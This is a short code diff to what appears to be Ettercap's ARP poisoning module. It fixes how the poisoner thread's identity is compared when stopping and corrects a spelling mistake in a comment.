@@ -156,7 +156,7 @@ static void arp_poisoning_stop(void)
    pid = ec_thread_getpid("arp_poisoner");
 
    /* the thread is active or not ? */
-   if (!pthread_equal(pid, EC_PTHREAD_NULL))
+   if (!pthread_equal(pid, ec_thread_getpid(NULL)))
       ec_thread_destroy(pid);
    else
       return;
@@ -289,7 +289,7 @@ EC_THREAD_FUNC(arp_poisoner)
          }
       }
       
-      /* if smart poisoning is enabled only poison inital and then only on request */
+      /* if smart poisoning is enabled only poison initial and then only on request */
       if (EC_GBL_CONF->arp_poison_smart && i >= 3)
           return NULL;
 
